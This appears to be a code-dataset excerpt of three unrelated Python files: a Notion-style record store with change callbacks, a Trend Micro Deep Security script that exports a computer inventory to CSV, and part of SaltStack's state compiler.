from inspect import signature
from threading import Lock
from pathlib import Path
from tzlocal import get_localzone
from .logger import logger
from .settings import CACHE_DIR
from .utils import extract_id
class MissingClass(object):
def __bool__(self):
return False
Missing = MissingClass()
class Callback(object):
def __init__(
self, callback, record, callback_id=None, extra_kwargs={}, watch_children=True
):
self.callback = callback
self.record = record
self.callback_id = callback_id or str(uuid.uuid4())
self.extra_kwargs = extra_kwargs
def __call__(self, difference, old_val, new_val):
kwargs = {}
kwargs.update(self.extra_kwargs)
kwargs["record"] = self.record
kwargs["callback_id"] = self.callback_id
kwargs["difference"] = difference
kwargs["changes"] = self.record._convert_diff_to_changelist(
difference, old_val, new_val
)
logger.debug("Firing callback {} with kwargs: {}".format(self.callback, kwargs))
# trim down the parameters we'll be passing, to include only those the callback will accept
params = signature(self.callback).parameters
if not any(["**" in str(param) for param in params.values()]):
# there's no "**kwargs" in the callback signature, so remove any unaccepted params
for arg in list(kwargs.keys()):
if arg not in params:
del kwargs[arg]
# perform the callback, gracefully handling any exceptions
try:
# trigger the callback within its own thread, so it won't block others if it's long-running
threading.Thread(target=self.callback, kwargs=kwargs, daemon=True).start()
except Exception as e:
logger.error(
"Error while processing callback for {}: {}".format(
repr(self.record), repr(e)
)
)
def __eq__(self, val):
if isinstance(val, str):
return self.callback_id.startswith(val)
elif isinstance(val, Callback):
return self.callback_id == val.callback_id
else:
return False
class RecordStore(object):
def __init__(self, client, cache_key=None):
self._mutex = Lock()
self._client = client
self._cache_key = cache_key
self._values = defaultdict(lambda: defaultdict(dict))
self._role = defaultdict(lambda: defaultdict(str))
self._collection_row_ids = {}
self._callbacks = defaultdict(lambda: defaultdict(list))
self._records_to_refresh = {}
self._pages_to_refresh = []
with self._mutex:
self._load_cache()
def _get(self, table, id):
return self._values[table].get(id, Missing)
def add_callback(self, record, callback, callback_id=None, extra_kwargs={}):
assert callable(
callback
), "The callback must be a 'callable' object, such as a function."
self.remove_callbacks(record._table, record.id, callback_id)
callback_obj = Callback(
callback, record, callback_id=callback_id, extra_kwargs=extra_kwargs
)
self._callbacks[record._table][record.id].append(callback_obj)
return callback_obj
def remove_callbacks(self, table, id, callback_or_callback_id_prefix=""):
"""
Remove all callbacks for the record specified by `table` and `id` that have a callback_id
starting with the string `callback_or_callback_id_prefix`, or are equal to the provided callback.
"""
if callback_or_callback_id_prefix is None:
return
callbacks = self._callbacks[table][id]
while callback_or_callback_id_prefix in callbacks:
callbacks.remove(callback_or_callback_id_prefix)
def _get_cache_path(self, attribute):
return str(
Path(CACHE_DIR).joinpath("{}{}.json".format(self._cache_key, attribute))
)
def _load_cache(self, attributes=("_values", "_role", "_collection_row_ids")):
if not self._cache_key:
return
for attr in attributes:
try:
with open(self._get_cache_path(attr)) as f:
if attr == "_collection_row_ids":
self._collection_row_ids.update(json.load(f))
else:
for k, v in json.load(f).items():
getattr(self, attr)[k].update(v)
except (FileNotFoundError, ValueError):
pass
def set_collection_rows(self, collection_id, row_ids):
if collection_id in self._collection_row_ids:
old_ids = set(self._collection_row_ids[collection_id])
new_ids = set(row_ids)
added = new_ids - old_ids
removed = old_ids - new_ids
for id in added:
self._trigger_callbacks(
"collection",
collection_id,
[("row_added", "rows", id)],
old_ids,
new_ids,
)
for id in removed:
self._trigger_callbacks(
"collection",
collection_id,
[("row_removed", "rows", id)],
old_ids,
new_ids,
)
self._collection_row_ids[collection_id] = row_ids
self._save_cache("_collection_row_ids")
def get_collection_rows(self, collection_id):
return self._collection_row_ids.get(collection_id, [])
def _save_cache(self, attribute):
if not self._cache_key:
return
with open(self._get_cache_path(attribute), "w") as f:
json.dump(getattr(self, attribute), f)
def _trigger_callbacks(self, table, id, difference, old_val, new_val):
for callback_obj in self._callbacks[table][id]:
callback_obj(difference, old_val, new_val)
def get_role(self, table, id, force_refresh=False):
self.get(table, id, force_refresh=force_refresh)
return self._role[table].get(id, None)
def get(self, table, id, force_refresh=False):
id = extract_id(id)
# look up the record in the current local dataset
result = self._get(table, id)
# if it's not found, try refreshing the record from the server
if result is Missing or force_refresh:
if table == "block":
self.call_load_page_chunk(id)
else:
self.call_get_record_values(**{table: id})
result = self._get(table, id)
return result if result is not Missing else None
def _update_record(self, table, id, value=None, role=None):
callback_queue = []
with self._mutex:
if role:
logger.debug("Updating 'role' for {}/{} to {}".format(table, id, role))
self._role[table][id] = role
self._save_cache("_role")
if value:
logger.debug(
"Updating 'value' for {}/{} to {}".format(table, id, value)
)
old_val = self._values[table][id]
difference = list(
diff(
old_val,
value,
ignore=["version", "last_edited_time", "last_edited_by"],
expand=True,
)
)
self._values[table][id] = value
self._save_cache("_values")
if old_val and difference:
logger.debug("Value changed! Difference: {}".format(difference))
callback_queue.append((table, id, difference, old_val, value))
# run callbacks outside the mutex to avoid lockups
for cb in callback_queue:
self._trigger_callbacks(*cb)
def call_get_record_values(self, **kwargs):
"""
Call the server's getRecordValues endpoint to update the local record store. The keyword arguments map
table names into lists of (or singular) record IDs to load for that table. Use True to refresh all known
records for that table.
"""
requestlist = []
for table, ids in kwargs.items():
# ensure "ids" is a proper list
if ids is True:
ids = list(self._values.get(table, {}).keys())
if isinstance(ids, str):
ids = [ids]
# if we're in a transaction, add the requested IDs to a queue to refresh when the transaction completes
if self._client.in_transaction():
self._records_to_refresh[table] = list(
set(self._records_to_refresh.get(table, []) + ids)
)
continue
requestlist += [{"table": table, "id": extract_id(id)} for id in ids]
if requestlist:
logger.debug(
"Calling 'getRecordValues' endpoint for requests: {}".format(
requestlist
)
)
results = self._client.post(
"getRecordValues", {"requests": requestlist}
).json()["results"]
for request, result in zip(requestlist, results):
self._update_record(
request["table"],
request["id"],
value=result.get("value"),
role=result.get("role"),
)
def get_current_version(self, table, id):
values = self._get(table, id)
if values and "version" in values:
return values["version"]
else:
return -1
def call_load_page_chunk(self, page_id):
if self._client.in_transaction():
self._pages_to_refresh.append(page_id)
return
data = {
"pageId": page_id,
"limit": 100000,
"cursor": {"stack": []},
"chunkNumber": 0,
"verticalColumns": False,
}
recordmap = self._client.post("loadPageChunk", data).json()["recordMap"]
self.store_recordmap(recordmap)
def store_recordmap(self, recordmap):
for table, records in recordmap.items():
for id, record in records.items():
self._update_record(
table, id, value=record.get("value"), role=record.get("role")
)
def call_query_collection(
self,
collection_id,
collection_view_id,
search="",
type="table",
aggregate=[],
aggregations=[],
filter={},
sort=[],
calendar_by="",
group_by="",
):
assert not (aggregate and aggregations), "Use only one of `aggregate` or `aggregations` (old vs new format)"
# convert singletons into lists if needed
if isinstance(aggregate, dict):
aggregate = [aggregate]
if isinstance(sort, dict):
sort = [sort]
data = {
"collectionId": collection_id,
"collectionViewId": collection_view_id,
"loader": {
"limit": 10000,
"loadContentCover": True,
"searchQuery": search,
"userLocale": "en",
"userTimeZone": str(get_localzone()),
"type": type,
},
"query": {
"aggregate": aggregate,
"aggregations": aggregations,
"filter": filter,
"sort": sort,
},
}
response = self._client.post("queryCollection", data).json()
self.store_recordmap(response["recordMap"])
return response["result"]
def handle_post_transaction_refreshing(self):
for block_id in self._pages_to_refresh:
self.call_load_page_chunk(block_id)
self._pages_to_refresh = []
self.call_get_record_values(**self._records_to_refresh)
self._records_to_refresh = {}
def run_local_operations(self, operations):
"""
Called to simulate the results of running the operations on the server, to keep the record store in sync
even when we haven't completed a refresh (or we did a refresh but the database hadn't actually updated yet...)
"""
for operation in operations:
self.run_local_operation(**operation)
def run_local_operation(self, table, id, path, command, args):
with self._mutex:
path = deepcopy(path)
new_val = deepcopy(self._values[table][id])
ref = new_val
# loop and descend down the path until it's consumed, or if we're doing a "set", there's one key left
while (len(path) > 1) or (path and command != "set"):
comp = path.pop(0)
if comp not in ref:
ref[comp] = [] if "list" in command else {}
ref = ref[comp]
if command == "update":
assert isinstance(ref, dict)
ref.update(args)
elif command == "set":
assert isinstance(ref, dict)
if path:
ref[path[0]] = args
else:
# this is the case of "setting the top level" (i.e. creating a record)
ref.clear()
ref.update(args)
elif command == "listAfter":
assert isinstance(ref, list)
if "after" in args:
ref.insert(ref.index(args["after"]) + 1, args["id"])
else:
ref.append(args["id"])
elif command == "listBefore":
assert isinstance(ref, list)
if "before" in args:
ref.insert(ref.index(args["before"]), args["id"])
else:
ref.insert(0, args["id"])
elif command == "listRemove":
try:
ref.remove(args["id"])
except ValueError:
pass
self._update_record(table, id, value=new_val)
|
listComputersParallelExpands.py
|
import deepsecurity as api
from deepsecurity.rest import ApiException as api_exception
from deepsecurity.expand import Expand
from threading import Thread
from threading import Lock
import copy
import codecs
import re
import time
import pickle
import os
import datetime
# DSM Host & port (must end in /api)
HOST = 'https://app.deepsecurity.trendmicro.com:443/api'
# API Key from the DSM defined in an environment variable called "API_KEY"
API_KEY = os.environ.get('API_KEY', None)
# Output file
FILENAME = 'report.csv'
# API Version
api_version = 'v1'
class DeepSecurityComputers:
def __init__(self, config):
self._lock = Lock()
self._threadDataLock = Lock()
self._threadsGroups = []
self._threadCount = 12
self._Groups = None
self._Computers = []
self._config = config
def GetAllGroups(self, configuration):
# Set search criteria
search_criteria = api.SearchCriteria()
search_criteria.id_value = 0
search_criteria.id_test = "greater-than"
# Create a search filter with maximum returned items
page_size = 5000
search_filter = api.SearchFilter()
search_filter.max_items = page_size
search_filter.search_criteria = [search_criteria]
groupsapi = api.ComputerGroupsApi(api.ApiClient(configuration))
paged_groups = []
try:
while True:
t0 = time.time()
groups = groupsapi.search_computer_groups(api_version, search_filter=search_filter)
t1 = time.time()
num_found = len(groups.computer_groups)
if num_found == 0:
print("No groups found.")
break
paged_groups.extend(groups.computer_groups)
# Get the ID of the last group in the page and return it with the number of groups on the page
last_id = groups.computer_groups[-1].id
search_criteria.id_value = last_id
print("Last ID: " + str(last_id), "Groups found: " + str(num_found))
print ("Return rate: {0} groups/sec".format(num_found / (t1 - t0)))
if num_found != page_size:
print ("Num_found {0} - Page size is {1}".format(num_found, page_size))
except api_exception as e:
return "Exception: " + str(e)
return paged_groups
def _GetGroupComputers(self, configuration, groupID):
# Set search group criteria
search_group_criteria = api.SearchCriteria()
search_group_criteria.field_name = "groupID"
if groupID:
search_group_criteria.numeric_value = groupID
search_group_criteria.numeric_test = "equal"
else:
search_group_criteria.null_test = True
# Set search criteria
search_criteria = api.SearchCriteria()
search_criteria.id_value = 0
search_criteria.id_test = "greater-than"
# Create a search filter with maximum returned items
page_size = 250
search_filter = api.SearchFilter()
search_filter.max_items = page_size
search_filter.search_criteria = [search_criteria, search_group_criteria]
# Perform the search and do work on the results
computers_api = api.ComputersApi(api.ApiClient(configuration))
paged_computers = []
while True:
try:
expand = Expand(Expand.ec2_virtual_machine_summary)
t0 = time.time()
computers = computers_api.search_computers(api_version, search_filter=search_filter, expand=expand.list())
t1 = time.time()
num_found = len(computers.computers)
current_paged_computers = []
if num_found == 0:
#This gets noise with so many threads
#print("No computers found.")
break
for computer in computers.computers:
current_paged_computers.append(computer)
paged_computers.append(current_paged_computers)
# Get the ID of the last computer in the page and return it with the number of computers on the page
last_id = computers.computers[-1].id
search_criteria.id_value = last_id
print("Last ID: " + str(last_id), "Computers found: " + str(num_found))
print ("Return rate: {0} hosts/sec".format(num_found / (t1 - t0)))
if num_found != page_size:
print ("Num_found {0} - Page size is {1}".format(num_found, page_size))
except api_exception as e:
print ("Exception: {0}".format(str(e)))
return paged_computers
def _computers_tread(self, configuration, groupID):
computersReturn = self._GetGroupComputers(configuration=configuration, groupID=groupID)
self._lock.acquire()
self._Computers.extend(computersReturn)
self._lock.release()
def _computers_tread_array(self, configuration, groups):
computerGroup = {}
while True:
self._threadDataLock.acquire()
if self._threadsGroups:
computerGroup = self._threadsGroups.pop()
self._threadDataLock.release()
else:
self._threadDataLock.release()
return
if computerGroup:
self._computers_tread(configuration=configuration, groupID=computerGroup.id)
else:
return
return
def GetAllComputers(self):
self._Groups = self.GetAllGroups(self._config)
return self._GetAllComputers(self._config, self._Groups)
def _GetAllComputers(self, configuration, groups):
threads = []
thread_data = {}
self._threadsGroups = copy.copy(groups)
t0 = time.time()
# this starts a thread to collect all computers that do not belong to any group
nonGroupcomputersThread = Thread(target=self._computers_tread, args=(configuration,None,))
nonGroupcomputersThread.start()
# Setup each thread
for i in range(self._threadCount):
threads.append(Thread(target=self._computers_tread_array, args=(configuration, None)))
# Start each thread
for i in range(self._threadCount):
threads[i].start()
#Wait for each thread
for i in range(self._threadCount):
threads[i].join()
# if needed, wait for the nno-group thread to finish.
nonGroupcomputersThread.join()
t1 = time.time()
# Give some total time/rate metrics.
print ("Total time {0} seconds for a rate of {1}hosts/second".format(t1-t0, len(self._Computers)/(t1-t0)))
return self._Groups,self._Computers
def WriteToDisk(computers, groups):
with open('computers.pkl', 'wb') as outfile:
pickle.dump(computers, outfile)
with open('rest_groups.pkl', 'wb') as outfile:
pickle.dump(groups, outfile)
return
def ReadFromDisk():
with open('rest_groups.pkl', 'rb') as infile:
_Groups = pickle.load(infile)
with open('computers.pkl', 'rb') as infile:
_RestComputers = pickle.load(infile)
return _Groups, _RestComputers
def ConvertToHostLight(value):
if value == "active":
return "Managed"
if value == "warning":
return "Warning"
if value == "error":
return "Critical"
if value == "inactive":
return "Unmanaged"
if value == "not-supported":
return "Unmanaged"
return "Unmanaged"
def _getAmazonAccount(groupid, groups, _awsAccounts, _accountPattern):
if groupid in _awsAccounts:
return _awsAccounts[groupid]
for g in groups:
if g.id == groupid:
if g.parent_group_id != None:
cloudAccount = _getAmazonAccount(g.parent_group_id, groups, _awsAccounts, _accountPattern)
_awsAccounts[g.id] = cloudAccount
return cloudAccount
if g.id in _awsAccounts:
return _awsAccounts[g.name]
_awsAccounts[g.id] = g.name
return g.name
return '0'
def _convertTimeStamp(serverTime):
if serverTime:
t = datetime.datetime.fromtimestamp(serverTime / 1000).strftime('%Y-%m-%dT%H:%M:%S.%fZ')
return t
return " "
def WriteCSV(pagedcomputers, groups):
_awsAccounts = {}
_accountPattern = re.compile("[0-9]{6,25}")
with codecs.open(FILENAME, "w", "utf-8") as outfile:
outfile.write(
"AWS Instance Id,Computer Status,Status,amazon_account_id,displayName,host_name, Agent Version, Last Agent Communication\n")
for computers in pagedcomputers:
for restComputer in computers:
try:
account = _getAmazonAccount(restComputer.group_id,groups, _awsAccounts, _accountPattern)
statusMessage = "{0}".format(restComputer.computer_status.agent_status_messages)
statusMessage = statusMessage.replace(","," ")
if restComputer.ec2_virtual_machine_summary:
instanceid = restComputer.ec2_virtual_machine_summary.instance_id
if instanceid is None:
instanceid = "None"
else:
instanceid = "None"
outfile.write("{0},{1},{2},{3},{4},{5}, {6}, {7}\n".format(
instanceid,
ConvertToHostLight(restComputer.computer_status.agent_status),
statusMessage,
account,
restComputer.display_name,
restComputer.host_name,
restComputer.agent_version,
_convertTimeStamp(restComputer.last_agent_communication)
))
except Exception as err:
print (err)
return
if __name__ == '__main__':
if not API_KEY:
raise ValueError('You must have "API_KEY" variable')
# Add Deep Security Manager host information to the api client configuration
configuration = api.Configuration()
configuration.host = HOST
configuration.verify_ssl = True
# Authentication
configuration.api_key['api-secret-key'] = API_KEY
dsComputers = DeepSecurityComputers(configuration)
groups,allComputers = dsComputers.GetAllComputers()
WriteToDisk(allComputers, groups)
# groups,allComputers = ReadFromDisk()
WriteCSV(allComputers, groups)
print "finished"
|
state.py
|
"""
The State Compiler is used to execute states in Salt. A state is unlike
an execution module in that instead of just executing a command, it
ensures that a certain state is present on the system.
The data sent to the state calls is as follows:
{ 'state': '<state module name>',
'fun': '<state function name>',
'name': '<the name argument passed to all states>'
'argn': '<arbitrary argument, can have many of these>'
}
"""
import copy
import datetime
import fnmatch
import logging
import os
import random
import re
import site
import sys
import time
import traceback
import salt.fileclient
import salt.loader
import salt.minion
import salt.pillar
import salt.syspaths as syspaths
import salt.transport.client
import salt.utils.args
import salt.utils.crypt
import salt.utils.data
import salt.utils.decorators.state
import salt.utils.dictupdate
import salt.utils.event
import salt.utils.files
import salt.utils.hashutils
import salt.utils.immutabletypes as immutabletypes
import salt.utils.msgpack
import salt.utils.platform
import salt.utils.process
import salt.utils.url
# Explicit late import to avoid circular import. DO NOT MOVE THIS.
import salt.utils.yamlloader as yamlloader
from salt.exceptions import CommandExecutionError, SaltRenderError, SaltReqTimeoutError
# pylint: disable=import-error,no-name-in-module,redefined-builtin
from salt.ext.six.moves import map, range, reload_module
from salt.serializers.msgpack import deserialize as msgpack_deserialize
from salt.serializers.msgpack import serialize as msgpack_serialize
from salt.template import compile_template, compile_template_str
from salt.utils.odict import DefaultOrderedDict, OrderedDict
# pylint: enable=import-error,no-name-in-module,redefined-builtin
log = logging.getLogger(__name__)
# These are keywords passed to state module functions which are to be used
# by salt in this state module and not on the actual state module function
STATE_REQUISITE_KEYWORDS = frozenset(
[
"onchanges",
"onchanges_any",
"onfail",
"onfail_any",
"onfail_all",
"onfail_stop",
"prereq",
"prerequired",
"watch",
"watch_any",
"require",
"require_any",
"listen",
]
)
STATE_REQUISITE_IN_KEYWORDS = frozenset(
["onchanges_in", "onfail_in", "prereq_in", "watch_in", "require_in", "listen_in"]
)
STATE_RUNTIME_KEYWORDS = frozenset(
[
"fun",
"state",
"check_cmd",
"failhard",
"onlyif",
"unless",
"creates",
"retry",
"order",
"parallel",
"prereq",
"prereq_in",
"prerequired",
"reload_modules",
"reload_grains",
"reload_pillar",
"runas",
"runas_password",
"fire_event",
"saltenv",
"use",
"use_in",
"__env__",
"__sls__",
"__id__",
"__orchestration_jid__",
"__pub_user",
"__pub_arg",
"__pub_jid",
"__pub_fun",
"__pub_tgt",
"__pub_ret",
"__pub_pid",
"__pub_tgt_type",
"__prereq__",
"__prerequired__",
]
)
STATE_INTERNAL_KEYWORDS = STATE_REQUISITE_KEYWORDS.union(
STATE_REQUISITE_IN_KEYWORDS
).union(STATE_RUNTIME_KEYWORDS)
def _odict_hashable(self):
return id(self)
OrderedDict.__hash__ = _odict_hashable
def split_low_tag(tag):
"""
Take a low tag and split it back into the low dict that it came from
"""
state, id_, name, fun = tag.split("_|-")
return {"state": state, "__id__": id_, "name": name, "fun": fun}
def _gen_tag(low):
"""
Generate the running dict tag string from the low data structure
"""
return "{0[state]}_|-{0[__id__]}_|-{0[name]}_|-{0[fun]}".format(low)
def _clean_tag(tag):
"""
Make tag name safe for filenames
"""
return salt.utils.files.safe_filename_leaf(tag)
def _l_tag(name, id_):
low = {
"name": "listen_{}".format(name),
"__id__": "listen_{}".format(id_),
"state": "Listen_Error",
"fun": "Listen_Error",
}
return _gen_tag(low)
def _calculate_fake_duration():
"""
Generate a NULL duration for when states do not run
but we want the results to be consistent.
"""
utc_start_time = datetime.datetime.utcnow()
local_start_time = utc_start_time - (
datetime.datetime.utcnow() - datetime.datetime.now()
)
utc_finish_time = datetime.datetime.utcnow()
start_time = local_start_time.time().isoformat()
delta = utc_finish_time - utc_start_time
# duration in milliseconds.microseconds
duration = (delta.seconds * 1000000 + delta.microseconds) / 1000.0
return start_time, duration
def get_accumulator_dir(cachedir):
"""
Return the directory that accumulator data is stored in, creating it if it
doesn't exist.
"""
fn_ = os.path.join(cachedir, "accumulator")
if not os.path.isdir(fn_):
# accumulator_dir is not present, create it
os.makedirs(fn_)
return fn_
def trim_req(req):
"""
Trim any function off of a requisite
"""
reqfirst = next(iter(req))
if "." in reqfirst:
return {reqfirst.split(".")[0]: req[reqfirst]}
return req
def state_args(id_, state, high):
"""
Return a set of the arguments passed to the named state
"""
args = set()
if id_ not in high:
return args
if state not in high[id_]:
return args
for item in high[id_][state]:
if not isinstance(item, dict):
continue
if len(item) != 1:
continue
args.add(next(iter(item)))
return args
def find_name(name, state, high):
"""
Scan high data for the id referencing the given name and return a list of (IDs, state) tuples that match
Note: if `state` is sls, then we are looking for all IDs that match the given SLS
"""
ext_id = []
if name in high:
ext_id.append((name, state))
# if we are requiring an entire SLS, then we need to add ourselves to everything in that SLS
elif state == "sls":
for nid, item in high.items():
if item["__sls__"] == name:
ext_id.append((nid, next(iter(item))))
# otherwise we are requiring a single state, lets find it
else:
# We need to scan for the name
for nid in high:
if state in high[nid]:
if isinstance(high[nid][state], list):
for arg in high[nid][state]:
if not isinstance(arg, dict):
continue
if len(arg) != 1:
continue
if arg[next(iter(arg))] == name:
ext_id.append((nid, state))
return ext_id
def find_sls_ids(sls, high):
"""
Scan for all ids in the given sls and return them in a dict; {name: state}
"""
ret = []
for nid, item in high.items():
try:
sls_tgt = item["__sls__"]
except TypeError:
if nid != "__exclude__":
log.error(
"Invalid non-dict item '%s' in high data. Value: %r", nid, item
)
continue
else:
if sls_tgt == sls:
for st_ in item:
if st_.startswith("__"):
continue
ret.append((nid, st_))
return ret
def format_log(ret):
"""
Format the state into a log message
"""
msg = ""
if isinstance(ret, dict):
# Looks like the ret may be a valid state return
if "changes" in ret:
# Yep, looks like a valid state return
chg = ret["changes"]
if not chg:
if ret["comment"]:
msg = ret["comment"]
else:
msg = "No changes made for {0[name]}".format(ret)
elif isinstance(chg, dict):
if "diff" in chg:
if isinstance(chg["diff"], str):
msg = "File changed:\n{}".format(chg["diff"])
if all([isinstance(x, dict) for x in chg.values()]):
if all([("old" in x and "new" in x) for x in chg.values()]):
msg = "Made the following changes:\n"
for pkg in chg:
old = chg[pkg]["old"]
if not old and old not in (False, None):
old = "absent"
new = chg[pkg]["new"]
if not new and new not in (False, None):
new = "absent"
# This must be able to handle unicode as some package names contain
# non-ascii characters like "Français" or "Español". See Issue #33605.
msg += "'{}' changed from '{}' to '{}'\n".format(
pkg, old, new
)
if not msg:
msg = str(ret["changes"])
if ret["result"] is True or ret["result"] is None:
log.info(msg)
else:
log.error(msg)
else:
# catch unhandled data
log.info(str(ret))
def master_compile(master_opts, minion_opts, grains, id_, saltenv):
"""
Compile the master side low state data, and build the hidden state file
"""
st_ = MasterHighState(master_opts, minion_opts, grains, id_, saltenv)
return st_.compile_highstate()
def ishashable(obj):
try:
hash(obj)
except TypeError:
return False
return True
def mock_ret(cdata):
"""
Returns a mocked return dict with information about the run, without
executing the state function
"""
# As this is expanded it should be sent into the execution module
# layer or it should be turned into a standalone loader system
if cdata["args"]:
name = cdata["args"][0]
else:
name = cdata["kwargs"]["name"]
return {
"name": name,
"comment": "Not called, mocked",
"changes": {},
"result": True,
}
class StateError(Exception):
"""
Custom exception class.
"""
class Compiler:
"""
Class used to compile and manage the High Data structure
"""
def __init__(self, opts, renderers):
self.opts = opts
self.rend = renderers
def render_template(self, template, **kwargs):
"""
Enforce the states in a template
"""
high = compile_template(
template,
self.rend,
self.opts["renderer"],
self.opts["renderer_blacklist"],
self.opts["renderer_whitelist"],
**kwargs
)
if not high:
return high
return self.pad_funcs(high)
def pad_funcs(self, high):
"""
Turns dot delimited function refs into function strings
"""
for name in high:
if not isinstance(high[name], dict):
if isinstance(high[name], str):
# Is this is a short state? It needs to be padded!
if "." in high[name]:
comps = high[name].split(".")
if len(comps) >= 2:
# Merge the comps
comps[1] = ".".join(comps[1 : len(comps)])
high[name] = {
# '__sls__': template,
# '__env__': None,
comps[0]: [comps[1]]
}
continue
continue
skeys = set()
for key in sorted(high[name]):
if key.startswith("_"):
continue
if not isinstance(high[name][key], list):
continue
if "." in key:
comps = key.split(".")
if len(comps) >= 2:
# Merge the comps
comps[1] = ".".join(comps[1 : len(comps)])
# Salt doesn't support state files such as:
#
# /etc/redis/redis.conf:
# file.managed:
# - user: redis
# - group: redis
# - mode: 644
# file.comment:
# - regex: ^requirepass
if comps[0] in skeys:
continue
high[name][comps[0]] = high[name].pop(key)
high[name][comps[0]].append(comps[1])
skeys.add(comps[0])
continue
skeys.add(key)
return high
def verify_high(self, high):
"""
Verify that the high data is viable and follows the data structure
"""
errors = []
if not isinstance(high, dict):
errors.append("High data is not a dictionary and is invalid")
reqs = OrderedDict()
for name, body in high.items():
if name.startswith("__"):
continue
if not isinstance(name, str):
errors.append(
"ID '{}' in SLS '{}' is not formed as a string, but "
"is a {}".format(name, body["__sls__"], type(name).__name__)
)
if not isinstance(body, dict):
err = "The type {} in {} is not formatted as a dictionary".format(
name, body
)
errors.append(err)
continue
for state in body:
if state.startswith("__"):
continue
if not isinstance(body[state], list):
errors.append(
"State '{}' in SLS '{}' is not formed as a list".format(
name, body["__sls__"]
)
)
else:
fun = 0
if "." in state:
fun += 1
for arg in body[state]:
if isinstance(arg, str):
fun += 1
if " " in arg.strip():
errors.append(
(
'The function "{}" in state '
'"{}" in SLS "{}" has '
"whitespace, a function with whitespace is "
"not supported, perhaps this is an argument "
'that is missing a ":"'
).format(arg, name, body["__sls__"])
)
elif isinstance(arg, dict):
# The arg is a dict, if the arg is require or
# watch, it must be a list.
#
# Add the requires to the reqs dict and check them
# all for recursive requisites.
argfirst = next(iter(arg))
if argfirst in ("require", "watch", "prereq", "onchanges"):
if not isinstance(arg[argfirst], list):
errors.append(
(
"The {}"
" statement in state '{}' in SLS '{}' "
"needs to be formed as a list"
).format(argfirst, name, body["__sls__"])
)
# It is a list, verify that the members of the
# list are all single key dicts.
else:
reqs[name] = {"state": state}
for req in arg[argfirst]:
if isinstance(req, str):
req = {"id": req}
if not isinstance(req, dict):
err = (
"Requisite declaration {}"
" in SLS {} is not formed as a"
" single key dictionary"
).format(req, body["__sls__"])
errors.append(err)
continue
req_key = next(iter(req))
req_val = req[req_key]
if "." in req_key:
errors.append(
"Invalid requisite type '{}' "
"in state '{}', in SLS "
"'{}'. Requisite types must "
"not contain dots, did you "
"mean '{}'?".format(
req_key,
name,
body["__sls__"],
req_key[: req_key.find(".")],
)
)
if not ishashable(req_val):
errors.append(
(
'Illegal requisite "{}", '
"is SLS {}\n"
).format(
str(req_val), body["__sls__"],
)
)
continue
# Check for global recursive requisites
reqs[name][req_val] = req_key
# I am going beyond 80 chars on
# purpose, this is just too much
# of a pain to deal with otherwise
if req_val in reqs:
if name in reqs[req_val]:
if reqs[req_val][name] == state:
if (
reqs[req_val]["state"]
== reqs[name][req_val]
):
err = (
"A recursive "
"requisite was found, SLS "
'"{}" ID "{}" ID "{}"'
).format(
body["__sls__"],
name,
req_val,
)
errors.append(err)
# Make sure that there is only one key in the
# dict
if len(list(arg)) != 1:
errors.append(
(
"Multiple dictionaries "
"defined in argument of state '{}' in SLS"
" '{}'"
).format(name, body["__sls__"])
)
if not fun:
if state == "require" or state == "watch":
continue
errors.append(
(
"No function declared in state '{}' in" " SLS '{}'"
).format(state, body["__sls__"])
)
elif fun > 1:
errors.append(
"Too many functions declared in state '{}' in "
"SLS '{}'".format(state, body["__sls__"])
)
return errors
def order_chunks(self, chunks):
"""
Sort the chunk list verifying that the chunks follow the order
specified in the order options.
"""
cap = 1
for chunk in chunks:
if "order" in chunk:
if not isinstance(chunk["order"], int):
continue
chunk_order = chunk["order"]
if chunk_order > cap - 1 and chunk_order > 0:
cap = chunk_order + 100
for chunk in chunks:
if "order" not in chunk:
chunk["order"] = cap
continue
if not isinstance(chunk["order"], (int, float)):
if chunk["order"] == "last":
chunk["order"] = cap + 1000000
elif chunk["order"] == "first":
chunk["order"] = 0
else:
chunk["order"] = cap
if "name_order" in chunk:
chunk["order"] = chunk["order"] + chunk.pop("name_order") / 10000.0
if chunk["order"] < 0:
chunk["order"] = cap + 1000000 + chunk["order"]
chunk["name"] = salt.utils.data.decode(chunk["name"])
chunks.sort(
key=lambda chunk: (
chunk["order"],
"{0[state]}{0[name]}{0[fun]}".format(chunk),
)
)
return chunks
def compile_high_data(self, high):
"""
"Compile" the high data as it is retrieved from the CLI or YAML into
the individual state executor structures
"""
chunks = []
for name, body in high.items():
if name.startswith("__"):
continue
for state, run in body.items():
funcs = set()
names = []
if state.startswith("__"):
continue
chunk = {"state": state, "name": name}
if "__sls__" in body:
chunk["__sls__"] = body["__sls__"]
if "__env__" in body:
chunk["__env__"] = body["__env__"]
chunk["__id__"] = name
for arg in run:
if isinstance(arg, str):
funcs.add(arg)
continue
if isinstance(arg, dict):
for key, val in arg.items():
if key == "names":
for _name in val:
if _name not in names:
names.append(_name)
continue
else:
chunk.update(arg)
if names:
name_order = 1
for entry in names:
live = copy.deepcopy(chunk)
if isinstance(entry, dict):
low_name = next(iter(entry.keys()))
live["name"] = low_name
list(map(live.update, entry[low_name]))
else:
live["name"] = entry
live["name_order"] = name_order
name_order = name_order + 1
for fun in funcs:
live["fun"] = fun
chunks.append(live)
else:
live = copy.deepcopy(chunk)
for fun in funcs:
live["fun"] = fun
chunks.append(live)
chunks = self.order_chunks(chunks)
return chunks
def apply_exclude(self, high):
"""
Read in the __exclude__ list and remove all excluded objects from the
high data
"""
if "__exclude__" not in high:
return high
ex_sls = set()
ex_id = set()
exclude = high.pop("__exclude__")
for exc in exclude:
if isinstance(exc, str):
# The exclude statement is a string, assume it is an sls
ex_sls.add(exc)
if isinstance(exc, dict):
# Explicitly declared exclude
if len(exc) != 1:
continue
key = next(iter(exc.keys()))
if key == "sls":
ex_sls.add(exc["sls"])
elif key == "id":
ex_id.add(exc["id"])
# Now the excludes have been simplified, use them
if ex_sls:
# There are sls excludes, find the associtaed ids
for name, body in high.items():
if name.startswith("__"):
continue
if body.get("__sls__", "") in ex_sls:
ex_id.add(name)
for id_ in ex_id:
if id_ in high:
high.pop(id_)
return high
class State:
"""
Class used to execute salt states
"""
def __init__(
self,
opts,
pillar_override=None,
jid=None,
pillar_enc=None,
proxy=None,
context=None,
mocked=False,
loader="states",
initial_pillar=None,
):
self.states_loader = loader
if "grains" not in opts:
opts["grains"] = salt.loader.grains(opts)
self.opts = opts
self.proxy = proxy
self._pillar_override = pillar_override
if pillar_enc is not None:
try:
pillar_enc = pillar_enc.lower()
except AttributeError:
pillar_enc = str(pillar_enc).lower()
self._pillar_enc = pillar_enc
log.debug("Gathering pillar data for state run")
if initial_pillar and not self._pillar_override:
self.opts["pillar"] = initial_pillar
else:
# Compile pillar data
